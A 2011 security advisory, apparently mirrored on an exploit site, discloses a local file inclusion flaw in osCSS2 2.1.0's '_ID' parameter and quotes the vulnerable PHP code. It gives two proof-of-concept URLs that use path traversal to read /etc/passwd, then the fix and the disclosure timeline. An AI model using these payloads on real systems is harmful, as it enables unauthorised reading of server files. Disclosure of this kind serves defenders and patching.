osCSS2 "_ID" parameter Local file inclusion

🗓️ 08 Nov 2011 00:00:00Reported by Stefan SchurtzType

zdt🔗 0day.today👁 17 Views

osCSS2 "_ID" parameter LFI vulnerability in 2.1.

Advisory:                   osCSS2 "_ID" parameter Local file inclusion
Advisory ID:            SSCHADV2011-034
Author:                     Stefan Schurtz
Affected Software:      Successfully tested on osCSS2 2.1.0 (latest version)
Vendor URL:             http://oscss.org/
Vendor Status:          Fixed in svn branche 2.1.0 and reported in develop version 2.1.1
 
==========================
Vulnerability Description
==========================
 
osCSS2 2.1.0 "_ID" parameter is prone to a LFI vulnerability
 
==========================
Vulnerable code
==========================
 
//.htaccess
RewriteRule ^shopping_cart.php(.{0,})$ content.php?_ID=shopping_cart.php&%{QUERY_STRING}
 
//content.php
require($page->path_gabarit());
 
// includes/classes/page.php
public function pile_file_lang($path_file){
    global $lang;
    if(substr($path_file,0,strlen(DIR_FS_CATALOG)) !=DIR_FS_CATALOG) $path_file= DIR_FS_CATALOG.$path_file;
 
if(!in_array($path_file,(array)$this->PileFileLang))
      include_once($path_file);
}
 
==================
PoC-Exploit
==================
 
http://<target>/catalog/shopping_cart.php?_ID=../../../../../../../../../../../etc/passwd
http://<target>/catalog/content.php?_ID=../../../../../../../../../../../etc/passwd
 
=========
Solution
=========
 
Fixed in svn branche 2.1.0 and reported in develop version 2.1.1
 
====================
Disclosure Timeline
====================
 
08-Nov-2011 - informed vendor
08-Nov-2011 - release date of this security advisory
 
========
Credits
========
 
Vulnerability found and advisory written by Stefan Schurtz.



#  0day.today [2018-01-11]  #

08 Nov 2011 00:00Current

7.1High risk

Vulners AI Score7.1